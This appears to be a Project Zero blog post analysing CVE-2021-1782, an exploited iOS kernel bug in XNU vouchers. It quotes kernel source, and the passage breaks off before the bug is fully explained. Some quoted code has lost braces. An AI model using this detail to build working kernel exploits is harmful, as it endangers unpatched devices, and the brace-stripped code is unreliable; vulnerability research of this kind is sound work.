CVE-2021-1782, an iOS in-the-wild vulnerability in vouchers

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability exploited in the wild and patched in early 2021. Like the writeup published last week looking at an ASN.1 parser bug, this blog post is based on the notes I took as I was analyzing the patch and trying to understand the XNU vouchers subsystem. I hope that this writeup serves as the missing documentation for how some of the internals of the voucher subsystem works and its quirks which lead to this vulnerability.

CVE-2021-1782 was fixed in iOS 14.4, as noted by @s1guza on twitter:

This vulnerability was fixed on January 26th 2021, and Apple updated the iOS 14.4 release notes on May 28th 2021 to indicate that the issue may have been actively exploited:

Vouchers

What exactly is a voucher?

The kernel code has a concise description:

Vouchers are a reference counted immutable (once-created) set of indexes to particular resource manager attribute values (which themselves are reference counted).

That definition is technically correct, though perhaps not all that helpful by itself.

To actually understand the root cause and exploitability of this vulnerability is going to require covering a lot of the voucher codebase. This part of XNU is pretty obscure, and pretty complicated.

A voucher is a reference-counted table of keys and values. Pointers to all created vouchers are stored in the global ivht_bucket hash table.

For a particular set of keys and values there should only be one voucher object. During the creation of a voucher there is a deduplication stage where the new voucher is compared against all existing vouchers in the hashtable to ensure they remain unique, returning a reference to the existing voucher if a duplicate has been found.

Here's the structure of a voucher:

struct ipc_voucher {

iv_index_t iv_hash; /* checksum hash */

iv_index_t iv_sum; /* checksum of values */

os_refcnt_t iv_refs; /* reference count */

iv_index_t iv_table_size; /* size of the voucher table */

iv_index_t iv_inline_table[IV_ENTRIES_INLINE];

iv_entry_t iv_table; /* table of voucher attr entries */

ipc_port_t iv_port; /* port representing the voucher */

queue_chain_t iv_hash_link; /* link on hash chain */

};

#define IV_ENTRIES_INLINE MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN

The voucher codebase is written in a very generic, extensible way, even though its actual use and supported feature set is quite minimal.

Keys

Keys in vouchers are not arbitrary. Keys are indexes into a voucher's iv_table; a value's position in the iv_table table determines what "key" it was stored under. Whilst the vouchers codebase supports the runtime addition of new key types this feature isn't used and there are just a small number of fixed, well-known keys:

#define MACH_VOUCHER_ATTR_KEY_ALL ((mach_voucher_attr_key_t)~0)

#define MACH_VOUCHER_ATTR_KEY_NONE ((mach_voucher_attr_key_t)0)

/* other well-known-keys will be added here */

#define MACH_VOUCHER_ATTR_KEY_ATM ((mach_voucher_attr_key_t)1)

#define MACH_VOUCHER_ATTR_KEY_IMPORTANCE ((mach_voucher_attr_key_t)2)

#define MACH_VOUCHER_ATTR_KEY_BANK ((mach_voucher_attr_key_t)3)

#define MACH_VOUCHER_ATTR_KEY_PTHPRIORITY ((mach_voucher_attr_key_t)4)

#define MACH_VOUCHER_ATTR_KEY_USER_DATA ((mach_voucher_attr_key_t)7)

#define MACH_VOUCHER_ATTR_KEY_TEST ((mach_voucher_attr_key_t)8)

#define MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN MACH_VOUCHER_ATTR_KEY_TEST

The iv_inline_table in an ipc_voucher has 8 entries. But of those, only four are actually supported and have any associated functionality. The ATM voucher attributes are deprecated and the code supporting them is gone so only IMPORTANCE (2), BANK (3), PTHPRIORITY (4) and USER_DATA (7) are valid keys. There's some confusion (perhaps on my part) about when exactly you should use the term key and when attribute; I'll use them interchangeably to refer to these key values and the corresponding "types" of values which they manage. More on that later.

Values

Each entry in a voucher iv_table is an iv_index_t:

typedef natural_t iv_index_t;

Each value is again an index; this time into a per-key cache of values, abstracted as a "Voucher Attribute Cache Control Object" represented by this structure:

struct ipc_voucher_attr_control {

os_refcnt_t ivac_refs;

boolean_t ivac_is_growing; /* is the table being grown */

ivac_entry_t ivac_table; /* table of voucher attr value entries */

iv_index_t ivac_table_size; /* size of the attr value table */

iv_index_t ivac_init_table_size; /* size of the attr value table */

iv_index_t ivac_freelist; /* index of the first free element */

ipc_port_t ivac_port; /* port for accessing the cache control */

lck_spin_t ivac_lock_data;

iv_index_t ivac_key_index; /* key index for this value */

};

These are accessed indirectly via another global table:

static ipc_voucher_global_table_element iv_global_table[MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN];

(Again, the comments in the code indicate that in the future that this table may grow in size and allow attributes to be managed in userspace, but for now it's just a fixed size array.)

Each element in that table has this structure:

typedef struct ipc_voucher_global_table_element {

ipc_voucher_attr_manager_t ivgte_manager;

ipc_voucher_attr_control_t ivgte_control;

mach_voucher_attr_key_t ivgte_key;

} ipc_voucher_global_table_element;

Both the iv_global_table and each voucher's iv_table are indexed by (key-1), not key, so the userdata entry is [6], not [7], even though the array still has 8 entries.

The ipc_voucher_attr_control_t provides an abstract interface for managing "values" and the ipc_voucher_attr_manager_t provides the "type-specific" logic to implement the semantics of each type (here by type I mean "key" or "attr" type.) Let's look more concretely at what that means. Here's the definition of ipc_voucher_attr_manager_t:

struct ipc_voucher_attr_manager {

ipc_voucher_attr_manager_release_value_t ivam_release_value;

ipc_voucher_attr_manager_get_value_t ivam_get_value;

ipc_voucher_attr_manager_extract_content_t ivam_extract_content;

ipc_voucher_attr_manager_command_t ivam_command;

ipc_voucher_attr_manager_release_t ivam_release;

ipc_voucher_attr_manager_flags ivam_flags;

};

ivam_flags is an int containing some flags; the other five fields are function pointers which define the semantics of the particular attr type. Here's the ipc_voucher_attr_manager structure for the user_data type:

const struct ipc_voucher_attr_manager user_data_manager = {

.ivam_release_value = user_data_release_value,

.ivam_get_value = user_data_get_value,

.ivam_extract_content = user_data_extract_content,

.ivam_command = user_data_command,

.ivam_release = user_data_release,

.ivam_flags = IVAM_FLAGS_NONE,

};

Those five function pointers are the only interface from the generic voucher code into the type-specific code. The interface may seem simple but there are some tricky subtleties in there; we'll get to that later!

Let's go back to the generic ipc_voucher_attr_control structure which maintains the "values" for each key in a type-agnostic way. The most important field is ivac_entry_t ivac_table, which is an array of ivac_entry_s's. It's an index into this table which is stored in each voucher's iv_table.

Here's the structure of each entry in that table:

struct ivac_entry_s {

iv_value_handle_t ivace_value;

iv_value_refs_t ivace_layered:1, /* layered effective entry */

ivace_releasing:1, /* release in progress */

ivace_free:1, /* on freelist */

ivace_persist:1, /* Persist the entry, don't

count made refs */

ivace_refs:28; /* reference count */

union {

iv_value_refs_t ivaceu_made; /* made count (non-layered) */

iv_index_t ivaceu_layer; /* next effective layer

(layered) */

} ivace_u;

iv_index_t ivace_next; /* hash or freelist */

iv_index_t ivace_index; /* hash head (independent) */

};

ivace_refs is a reference count for this table index. Note that this entry is inline in an array; so this reference count going to zero doesn't cause the ivac_entry_s to be free'd back to a kernel allocator (like the zone allocator for example.) Instead, it moves this table index onto a freelist of empty entries. The table can grow but never shrink.

Table entries which aren't free store a type-specific "handle" in ivace_value. Here's the typedef chain for that type:

iv_value_handle_t ivace_value

typedef mach_voucher_attr_value_handle_t iv_value_handle_t;

typedef uint64_t mach_voucher_attr_value_handle_t;

The handle is a uint64_t but in reality the attrs can (and do) store pointers there, hidden behind casts.

A guarantee made by the attr_control is that there will only ever be one (live) ivac_entry_s for a particular ivace_value. This means that each time a new ivace_value needs an ivac_entry the attr_control's ivac_table needs to be searched to see if a matching value is already present. To speed this up in-use ivac_entries are linked together in hash buckets so that a (hopefully significantly) shorter linked-list of entries can be searched rather than a linear scan of the whole table. (Note that it's not a linked-list of pointers; each link in the chain is an index into the table.)

Userdata attrs

user_data is one of the four types of supported, implemented voucher attr types. It's only purpose is to manage buffers of arbitrary, user controlled data. Since the attr_control performs deduping only on the ivace_value (which is a pointer) the userdata attr manager is responsible for ensuring that userdata values which have identical buffer values (matching length and bytes) have identical pointers.

To do this it maintains a hash table of user_data_value_element structures, which wrap a variable-sized buffer of bytes:

struct user_data_value_element {

mach_voucher_attr_value_reference_t e_made;

mach_voucher_attr_content_size_t e_size;

iv_index_t e_sum;

iv_index_t e_hash;

queue_chain_t e_hash_link;

uint8_t e_data[];

};

Each inline e_data buffer can be up to 16KB. e_hash_link stores the hash-table bucket list pointer.

e_made is not a simple reference count. Looking through the code you'll notice that there are no places where it's ever decremented. Since there should (nearly) always be a 1:1 mapping between an ivace_entry and a user_data_value_element this structure shouldn't need to be reference counted. There is however one very fiddly race condition (which isn't the race condition which causes the vulnerability!) which necessitates the e_made field. This race condition is sort-of documented and we'll get there eventually...

Recipes

The host_create_mach_voucher host port MIG (Mach Interface Generator) method is the userspace interface for creating vouchers:

kern_return_t

host_create_mach_voucher(mach_port_name_t host,

mach_voucher_attr_raw_recipe_array_t recipes,

mach_voucher_attr_recipe_size_t recipesCnt,

mach_port_name_t *voucher);

recipes points to a buffer filled with a sequence of packed variable-size mach_voucher_attr_recipe_data structures:

typedef struct mach_voucher_attr_recipe_data {

mach_voucher_attr_key_t key;

mach_voucher_attr_recipe_command_t command;

mach_voucher_name_t previous_voucher;

mach_voucher_attr_content_size_t content_size;

uint8_t content[];

} mach_voucher_attr_recipe_data_t;

key is one of the four supported voucher attr types we've seen before (importance, bank, pthread_priority and user_data) or a wildcard value (MACH_VOUCHER_ATTR_KEY_ALL) indicating that the command should apply to all keys. There are a number of generic commands as well as type-specific commands. Commands can optionally refer to existing vouchers via the previous_voucher field, which should name a voucher port.

Here are the supported generic commands for voucher creation:

MACH_VOUCHER_ATTR_COPY: copy the attr value from the previous voucher. You can specify the wildcard key to copy all the attr values from the previous voucher.

MACH_VOUCHER_ATTR_REMOVE: remove the specified attr value from the voucher under construction. This can also remove all the attributes from the voucher under construction (which, arguably, makes no sense.)

MACH_VOUCHER_ATTR_SET_VALUE_HANDLE: this command is only valid for kernel clients; it allows the caller to specify an arbitrary ivace_value, which doesn't make sense for userspace and shouldn't be reachable.

MACH_VOUCHER_ATTR_REDEEM: the semantics of redeeming an attribute from a previous voucher are not defined by the voucher code; it's up to the individual managers to determine what that might mean.

Here are the attr-specific commands for voucher creation for each type:

bank:

MACH_VOUCHER_ATTR_BANK_CREATE

MACH_VOUCHER_ATTR_BANK_MODIFY_PERSONA

MACH_VOUCHER_ATTR_AUTO_REDEEM

MACH_VOUCHER_ATTR_SEND_PREPROCESS

importance:

MACH_VOUCHER_ATTR_IMPORTANCE_SELF

user_data:

MACH_VOUCHER_ATTR_USER_DATA_STORE

pthread_priority:

MACH_VOUCHER_ATTR_PTHPRIORITY_CREATE

Note that there are further commands which can be "executed against" vouchers via the mach_voucher_attr_command MIG method which calls the attr manager's ivam_command function pointer. Those are:

bank:

BANK_ORIGINATOR_PID

BANK_PERSONA_TOKEN

BANK_PERSONA_ID

importance:

MACH_VOUCHER_IMPORTANCE_ATTR_DROP_EXTERNAL

user_data:

none

pthread_priority:

none

Let's look at example recipe for creating a voucher with a single user_data attr, consisting of the 4 bytes {0x41, 0x41, 0x41, 0x41}:

struct udata_dword_recipe {

mach_voucher_attr_recipe_data_t recipe;

uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;

Let's follow the path of this recipe in detail.

Here's the most important part of host_create_mach_voucher showing the three high-level phases: voucher allocation, attribute creation and voucher de-duping. It's not the responsibility of this code to find or allocate a mach port for the voucher; that's done by the MIG layer code.

/* allocate new voucher */

voucher = iv_alloc(ivgt_keys_in_use);

if (IV_NULL == voucher) {

return KERN_RESOURCE_SHORTAGE;

}

/* iterate over the recipe items */

while (0 < recipe_size - recipe_used) {

ipc_voucher_t prev_iv;

if (recipe_size - recipe_used < sizeof(*sub_recipe)) {

kr = KERN_INVALID_ARGUMENT;

break;

}

/* find the next recipe */

sub_recipe =

(mach_voucher_attr_recipe_t)(void *)&recipes[recipe_used];

if (recipe_size - recipe_used - sizeof(*sub_recipe) <

sub_recipe->content_size) {

kr = KERN_INVALID_ARGUMENT;

break;

}

recipe_used += sizeof(*sub_recipe) + sub_recipe->content_size;

/* convert voucher port name (current space) */

/* into a voucher reference */

prev_iv =

convert_port_name_to_voucher(sub_recipe->previous_voucher);

if (MACH_PORT_NULL != sub_recipe->previous_voucher &&

IV_NULL == prev_iv) {

kr = KERN_INVALID_CAPABILITY;

break;

}

kr = ipc_execute_voucher_recipe_command(

voucher,

sub_recipe->key,

sub_recipe->command,

prev_iv,

sub_recipe->content,

sub_recipe->content_size,

FALSE);

ipc_voucher_release(prev_iv);

if (KERN_SUCCESS != kr) {

break;

}

if (KERN_SUCCESS == kr) {

*new_voucher = iv_dedup(voucher);

} else {

*new_voucher = IV_NULL;

iv_dealloc(voucher, FALSE);

}

At the top of this snippet a new voucher is allocated in iv_alloc. ipc_execute_voucher_recipe_command is then called in a loop to consume however many sub-recipe structures were provided by userspace. Each sub-recipe can optionally refer to an existing voucher via the sub-recipe previous_voucher field. Note that MIG doesn't natively support variable-sized structures containing ports so it's passed as a mach port name which is looked up in the calling task's mach port namespace and converted to a voucher reference by convert_port_name_to_voucher. The intended functionality here is to be able to refer to attrs in other vouchers to copy or "redeem" them. As discussed, the semantics of redeeming a voucher attr isn't defined by the abstract voucher code and it's up to the individual attr managers to decide what that means.

Once the entire recipe has been consumed and all the iv_table entries filled in, iv_dedup then searches the ivht_bucket hash table to see if there's an existing voucher with a matching set of attributes. Remember that each attribute value stored in a voucher is an index into the attribute controller's attribute table; and those attributes are unique, so it suffices to simply compare the array of voucher indexes to determine whether all attribute values are equal. If a matching voucher is found, iv_dedup returns a reference to the existing voucher and calls iv_dealloc to free the newly created newly-created voucher. Otherwise, if no existing, matching voucher is found, iv_dedup adds the newly created voucher to the ivht_bucket hash table.

Let's look at ipc_execute_voucher_recipe_command which is responsible for filling in the requested entries in the voucher iv_table. Note that key and command are arbitrary, controlled dwords. content is a pointer to a buffer of controlled bytes, and content_size is the correct size of that input buffer. The MIG layer limits the overall input size of the recipe (which is a collection of sub-recipes) to 5260 bytes, and any input content buffers would have to fit in there.

static kern_return_t

ipc_execute_voucher_recipe_command(

ipc_voucher_t voucher,

mach_voucher_attr_key_t key,

mach_voucher_attr_recipe_command_t command,

ipc_voucher_t prev_iv,

mach_voucher_attr_content_t content,

mach_voucher_attr_content_size_t content_size,

boolean_t key_priv)

{

iv_index_t prev_val_index;

iv_index_t val_index;

kern_return_t kr;

switch (command) {

MACH_VOUCHER_ATTR_USER_DATA_STORE isn't one of the switch statement case values here so the code falls through to the default case:

default:

kr = ipc_replace_voucher_value(voucher,

key,

command,

prev_iv,

content,

content_size);

if (KERN_SUCCESS != kr) {

return kr;

}

break;

}

return KERN_SUCCESS;

Here's that code:

static kern_return_t

ipc_replace_voucher_value(

ipc_voucher_t voucher,

mach_voucher_attr_key_t key,

mach_voucher_attr_recipe_command_t command,

ipc_voucher_t prev_voucher,

mach_voucher_attr_content_t content,

mach_voucher_attr_content_size_t content_size)

{

...

* Get the manager for this key_index.

* Returns a reference on the control.

key_index = iv_key_to_index(key);

ivgt_lookup(key_index, TRUE, &ivam, &ivac);

if (IVAM_NULL == ivam) {

return KERN_INVALID_ARGUMENT;

}

iv_key_to_index just subtracts 1 from key (assuming it's valid and not MACH_VOUCHER_ATRR_KEY_ALL):

static inline iv_index_t

iv_key_to_index(mach_voucher_attr_key_t key)

{

if (MACH_VOUCHER_ATTR_KEY_ALL == key ||

MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN < key) {

return IV_UNUSED_KEYINDEX;

}

return (iv_index_t)key - 1;

}

ivgt_lookup then gets a reference on that key's attr manager and attr controller. The manager is really just a bunch of function pointers which define the semantics of what different "key types" actually mean; and the controller stores (and caches) values for those keys.

Let's keep reading ipc_replace_voucher_value. Here's the next statement:

/* save the current value stored in the forming voucher */

save_val_index = iv_lookup(voucher, key_index);

This point is important for getting a good feeling for how the voucher code is supposed to work; recipes can refer not only to other vouchers (via the previous_voucher port) but they can also refer to themselves during creation. You don't have to have just one sub-recipe per attr type for which you wish to have a value in your voucher; you can specify multiple sub-recipes for that type. Does it actually make any sense to do that? Well, luckily for the security researcher we don't have to worry about whether functionality actually makes any sense; it's all just a weird machine to us! (There's allusions in the code to future functionality where attribute values can be "layered" or "linked" but for now such functionality doesn't exist.)

iv_lookup returns the "value index" for the given key in the particular voucher. That means it just returns the iv_index_t in the iv_table of the given voucher:

static inline iv_index_t

iv_lookup(ipc_voucher_t iv, iv_index_t key_index)

{

if (key_index < iv->iv_table_size) {

return iv->iv_table[key_index];

}

return IV_UNUSED_VALINDEX;

}

This value index uniquely identifies an existing attribute value, but you need to ask the attribute's controller for the actual value. Before getting that previous value though, the code first determines whether this sub-recipe might be trying to refer to the value currently stored by this voucher or has explicitly passed in a previous_voucher. The value in the previous voucher takes precedence over whatever is already in the under-construction voucher.

prev_val_index = (IV_NULL != prev_voucher) ?

iv_lookup(prev_voucher, key_index) :

save_val_index;

Then the code looks up the actual previous value to operate on:

ivace_lookup_values(key_index, prev_val_index,

previous_vals, &previous_vals_count);

key_index is the key we're operating on, MACH_VOUCHER_ATTR_KEY_USER_DATA in this example. This function is called ivace_lookup_values (note the plural). There are some comments in the voucher code indicating that maybe in the future values could themselves be put into a linked-list such that you could have larger values (or layered/chained values.) But this functionality isn't implemented; ivace_lookup_values will only ever return 1 value.

Here's ivace_lookup_values:

static void

ivace_lookup_values(

iv_index_t key_index,

iv_index_t value_index,

mach_voucher_attr_value_handle_array_t values,

mach_voucher_attr_value_handle_array_size_t *count)

{

ipc_voucher_attr_control_t ivac;

ivac_entry_t ivace;

if (IV_UNUSED_VALINDEX == value_index ||

MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN <= key_index) {

*count = 0;

return;

}

ivac = iv_global_table[key_index].ivgte_control;

assert(IVAC_NULL != ivac);

* Get the entry and then the linked values.

ivac_lock(ivac);

assert(value_index < ivac->ivac_table_size);

ivace = &ivac->ivac_table[value_index];

* TODO: support chained values (for effective vouchers).

assert(ivace->ivace_refs > 0);

values[0] = ivace->ivace_value;

ivac_unlock(ivac);

*count = 1;

}

The locking used in the vouchers code is very important for properly understanding the underlying vulnerability when we eventually get there, but for now I'm glossing over it and we'll return to examine the relevant locks when necessary.

Let's discuss the ivace_lookup_values code. They index the iv_global_table to get a pointer to the attribute type's controller:

ivac = iv_global_table[key_index].ivgte_control;

They take that controller's lock then index its ivac_table to find that value's struct ivac_entry_s and read the ivace_value value from there:

ivac_lock(ivac);

assert(value_index < ivac->ivac_table_size);

ivace = &ivac->ivac_table[value_index];

assert(ivace->ivace_refs > 0);

values[0] = ivace->ivace_value;

ivac_unlock(ivac);

*count = 1;

Let's go back to the calling function (ipc_replace_voucher_value) and keep reading:

/* Call out to resource manager to get new value */

new_value_voucher = IV_NULL;

kr = (ivam->ivam_get_value)(

ivam, key, command,

previous_vals, previous_vals_count,

content, content_size,

&new_value, &new_flag, &new_value_voucher);

if (KERN_SUCCESS != kr) {

ivac_release(ivac);

return kr;

}

ivam->ivam_get_value is calling the attribute type's function pointer which defines the meaning for the particular type of "get_value". The term get_value here is a little confusing; aren't we trying to store a new value? (and there's no subsequent call to a method like "store_value".) A better way to think about the semantics of get_value is that it's meant to evaluate both previous_vals (either the value from previous_voucher or the value currently in this voucher) and content (the arbitrary byte buffer from this sub-recipe) and combine/evaluate them to create a value representation. It's then up to the controller layer to store/cache that value. (Actually there's one tedious snag in this system which we'll get to involving locking...)

ivam_get_value for the user_data attribute type is user_data_get_value:

static kern_return_t

user_data_get_value(

ipc_voucher_attr_manager_t __assert_only manager,

mach_voucher_attr_key_t __assert_only key,

mach_voucher_attr_recipe_command_t command,

mach_voucher_attr_value_handle_array_t prev_values,

mach_voucher_attr_value_handle_array_size_t prev_value_count,

mach_voucher_attr_content_t content,

mach_voucher_attr_content_size_t content_size,

mach_voucher_attr_value_handle_t *out_value,

mach_voucher_attr_value_flags_t *out_flags,

ipc_voucher_t *out_value_voucher)

{

user_data_element_t elem;

assert(&user_data_manager == manager);

USER_DATA_ASSERT_KEY(key);

/* never an out voucher */

*out_value_voucher = IPC_VOUCHER_NULL;

*out_flags = MACH_VOUCHER_ATTR_VALUE_FLAGS_NONE;

switch (command) {

case MACH_VOUCHER_ATTR_REDEEM:

/* redeem of previous values is the value */

if (0 < prev_value_count) {

elem = (user_data_element_t)prev_values[0];

assert(0 < elem->e_made);

elem->e_made++;

*out_value = prev_values[0];

return KERN_SUCCESS;

}

/* redeem of default is default */

*out_value = 0;

return KERN_SUCCESS;

case MACH_VOUCHER_ATTR_USER_DATA_STORE:

if (USER_DATA_MAX_DATA < content_size) {

return KERN_RESOURCE_SHORTAGE;

}

/* empty is the default */

if (0 == content_size) {

*out_value = 0;

return KERN_SUCCESS;

}

elem = user_data_dedup(content, content_size);

*out_value = (mach_voucher_attr_value_handle_t)elem;

return KERN_SUCCESS;

default:

/* every other command is unknown */

return KERN_INVALID_ARGUMENT;

}

Let's look at the MACH_VOUCHER_ATTR_USER_DATA_STORE case, which is the command we put in our single sub-recipe. (The vulnerability is in the MACH_VOUCHER_ATTR_REDEEM code above but we need a lot more background before we get to that.) In the MACH_VOUCHER_ATTR_USER_DATA_STORE case the input arbitrary byte buffer is passed to user_data_dedup, then that return value is returned as the value of out_value. Here's user_data_dedup:

static user_data_element_t

user_data_dedup(

mach_voucher_attr_content_t content,

mach_voucher_attr_content_size_t content_size)

{

iv_index_t sum;

iv_index_t hash;

user_data_element_t elem;

user_data_element_t alloc = NULL;

sum = user_data_checksum(content, content_size);

hash = USER_DATA_HASH_BUCKET(sum);

retry:

user_data_lock();

queue_iterate(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link) {

assert(elem->e_hash == hash);

/* if sums match... */

if (elem->e_sum == sum && elem->e_size == content_size) {

iv_index_t i;

/* and all data matches */

for (i = 0; i < content_size; i++) {

if (elem->e_data[i] != content[i]) {

break;

}

if (i < content_size) {

continue;

}

/* ... we found a match... */

elem->e_made++;

user_data_unlock();

if (NULL != alloc) {

kfree(alloc, sizeof(*alloc) + content_size);

}

return elem;

}

if (NULL == alloc) {

user_data_unlock();

alloc = (user_data_element_t)kalloc(sizeof(*alloc) + content_size);

alloc->e_made = 1;

alloc->e_size = content_size;

alloc->e_sum = sum;

alloc->e_hash = hash;

memcpy(alloc->e_data, content, content_size);

goto retry;

}

queue_enter(&user_data_bucket[hash], alloc, user_data_element_t, e_hash_link);

user_data_unlock();

return alloc;

}

The user_data attributes are just uniquified buffer pointers. Each buffer is represented by a user_data_value_element structure, which has a meta-data header followed by a variable-sized inline buffer containing the arbitrary byte data:

struct user_data_value_element {

mach_voucher_attr_value_reference_t e_made;

mach_voucher_attr_content_size_t e_size;

iv_index_t e_sum;

iv_index_t e_hash;

queue_chain_t e_hash_link;

uint8_t e_data[];

};

Pointers to those elements are stored in the user_data_bucket hash table.

user_data_dedup searches the user_data_bucket hash table to see if a matching user_data_value_element already exists. If not, it allocates one and adds it to the hash table. Note that it's not allowed to hold locks while calling kalloc() so the code first has to drop the user_data lock, allocate a user_data_value_element then take the lock again and check the hash table a second time to ensure that another thread didn't also allocate and insert a matching user_data_value_element while the lock was dropped.

The e_made field of user_data_value_element is critical to the vulnerability we're eventually going to discuss, so let's examine its use here.

If a new user_data_value_element is created its e_made field is initialized to 1. If an existing user_data_value_element is found which matches the requested content buffer the e_made field is incremented before a pointer to that user_data_value_element is returned. Redeeming a user_data_value_element (via the MACH_VOUCHER_ATTR_REDEEM command) also just increments the e_made of the element being redeemed before returning it. The type of the e_made field is mach_voucher_attr_value_reference_t so it's tempting to believe that this field is a reference count. The reality is more subtle than that though.

The first hint that e_made isn't exactly a reference count is that if you search for e_made in XNU you'll notice that it's never decremented. There are also no places where a pointer to that structure is cast to another type which treats the first dword as a reference count. e_made can only ever go up (well technically there's also nothing stopping it overflowing so it can also go down 1 in every 232 increments...)

Let's go back up the stack to the caller of user_data_get_value, ipc_replace_voucher_value:

The next part is again code for unused functionality. No current voucher attr type implementations return a new_value_voucher so this condition is never true:

/* TODO: value insertion from returned voucher */

if (IV_NULL != new_value_voucher) {

iv_release(new_value_voucher);

}

Next, the code needs to wrap new_value in an ivace_entry and determine the index of that ivace_entry in the controller's table of values. This is done by ivace_reference_by_value:

* Find or create a slot in the table associated

* with this attribute value. The ivac reference

* is transferred to a new value, or consumed if

* we find a matching existing value.

val_index = ivace_reference_by_value(ivac, new_value, new_flag);

iv_set(voucher, key_index, val_index);

* Look up the values for a given <key, index> pair.

* Consumes a reference on the passed voucher control.

* Either it is donated to a newly-created value cache

* or it is released (if we piggy back on an existing

* value cache entry).

static iv_index_t

ivace_reference_by_value(

ipc_voucher_attr_control_t ivac,

mach_voucher_attr_value_handle_t value,

mach_voucher_attr_value_flags_t flag)

{

ivac_entry_t ivace = IVACE_NULL;

iv_index_t hash_index;

iv_index_t index;

if (IVAC_NULL == ivac) {

return IV_UNUSED_VALINDEX;

}

ivac_lock(ivac);

restart:

hash_index = IV_HASH_VAL(ivac->ivac_init_table_size, value);

index = ivac->ivac_table[hash_index].ivace_index;

while (index != IV_HASH_END) {

assert(index < ivac->ivac_table_size);

ivace = &ivac->ivac_table[index];

assert(!ivace->ivace_free);

if (ivace->ivace_value == value) {

break;

}

assert(ivace->ivace_next != index);

index = ivace->ivace_next;

}

/* found it? */

if (index != IV_HASH_END) {

/* only add reference on non-persistent value */

if (!ivace->ivace_persist) {

ivace->ivace_refs++;

ivace->ivace_made++;

}

ivac_unlock(ivac);

ivac_release(ivac);

return index;

}

/* insert new entry in the table */

index = ivac->ivac_freelist;

if (IV_FREELIST_END == index) {

/* freelist empty */

ivac_grow_table(ivac);

goto restart;

}

/* take the entry off the freelist */

ivace = &ivac->ivac_table[index];

ivac->ivac_freelist = ivace->ivace_next;

/* initialize the new entry */

ivace->ivace_value = value;

ivace->ivace_refs = 1;

ivace->ivace_made = 1;

ivace->ivace_free = FALSE;

ivace->ivace_persist = (flag & MACH_VOUCHER_ATTR_VALUE_FLAGS_PERSIST) ? TRUE : FALSE;

/* insert the new entry in the proper hash chain */

ivace->ivace_next = ivac->ivac_table[hash_index].ivace_index;

ivac->ivac_table[hash_index].ivace_index = index;

ivac_unlock(ivac);

/* donated passed in ivac reference to new entry */

return index;

}

You'll notice that this code has a very similar structure to user_data_dedup; it needs to do almost exactly the same thing. Under a lock (this time the controller's lock) traverse a hash table looking for a matching value. If one can't be found, allocate a new entry and put the value in the hash table. The same unlock/lock dance is needed, but not every time because ivace's are kept in a table of struct ivac_entry_s's so the lock only needs to be dropped if the table needs to grow.

If a new entry is allocated (from the freelist of ivac_entry's in the table) then its reference count (ivace_refs) is set to 1, and its ivace_made count is set to 1. If an existing entry is found then both its ivace_refs and ivace_made counts are incremented:

ivace->ivace_refs++;

ivace->ivace_made++;

Finally, the index of this entry in the table of all the controller's entries is returned, because it's the index into that table which a voucher stores; not a pointer to the ivace.

ivace_reference_by_value then calls iv_set to store that index into the correct slot in the voucher's iv_table, which is just a simple array index operation:

iv_set(voucher, key_index, val_index);

static void

iv_set(ipc_voucher_t iv,

iv_index_t key_index,

iv_index_t value_index)

{

assert(key_index < iv->iv_table_size);

iv->iv_table[key_index] = value_index;

}

Our journey following this recipe is almost over! Since we only supplied one sub-recipe we exit the loop in host_create_mach_voucher and reach the call to iv_dedup:

if (KERN_SUCCESS == kr) {

*new_voucher = iv_dedup(voucher);

I won't show the code for iv_dedup here because it's again structurally almost identical to the two other levels of deduping we've examined. In fact it's a little simpler because it can hold the associated hash table lock the whole time (via ivht_lock()) since it doesn't need to allocate anything. If a match is found (that is, the hash table already contains a voucher with exactly the same set of value indexes) then a reference is taken on that existing voucher and a reference is dropped on the voucher we just created from the input recipe via iv_dealloc:

iv_dealloc(new_iv, FALSE);

The FALSE argument here indicates that new_iv isn't in the ivht_bucket hashtable so shouldn't be removed from there if it is going to be destroyed. Vouchers are only added to the hashtable after the deduping process to prevent deduplication happening against incomplete vouchers.

The final step occurs when host_create_mach_voucher returns. Since this is a MIG method, if it returns success and new_voucher isn't IV_NULL, new_voucher will be converted into a mach port; a send right to which will be given to the userspace caller. This is the final level of deduplication; there can only ever be one mach port representing a particular voucher. This is implemented by the voucher structure's iv_port member.

(For the sake of completeness note that there are actually two userspace interfaces to host_create_mach_voucher; the host port MIG method and also the host_create_mach_voucher_trap mach trap. The trap interface has to emulate the MIG semantics though.)

Destruction

Although I did briefly hint at a vulnerability above we still haven't actually seen enough code to determine that that bug actually has any security consequences. This is where things get complicated ;-)

Let's start with the result of the situation we described above, where we created a voucher port with the following recipe:

struct udata_dword_recipe {

mach_voucher_attr_recipe_data_t recipe;

uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;

This will end up with the following data structures in the kernel:

voucher_port {

ip_kobject = reference-counted pointer to the voucher

}

voucher {

iv_refs = 1;

iv_table[6] = reference-counted *index* into user_data controller's ivac_table

}

controller {

ivace_table[index] =

{

ivace_refs = 1;

ivace_made = 1;

ivace_value = pointer to user_data_value_element

}

user_data_value_element {

e_made = 1;

e_data[] = {0x41, 0x41, 0x41, 0x41}

}

Let's look at what happens when we drop the only send right to the voucher port and the voucher gets deallocated.

We'll skip analysis of the mach port part; essentially, once all the send rights to the mach port holding a reference to the voucher are deallocated iv_release will get called to drop its reference on the voucher. And if that was the last reference iv_release calls iv_dealloc and we'll pick up the code there:

void

iv_dealloc(ipc_voucher_t iv, boolean_t unhash)

iv_dealloc removes the voucher from the hash table, destroys the mach port associated with the voucher (if there was one) then releases a reference on each value index in the iv_table:

for (i = 0; i < iv->iv_table_size; i++) {

ivace_release(i, iv->iv_table[i]);

}

Recall that the index in the iv_table is the "key index", which is one less than the key, which is why i is being passed to ivace_release. The value in iv_table alone is meaningless without knowing under which index it was stored in the iv_table. Here's the start of ivace_release:

static void

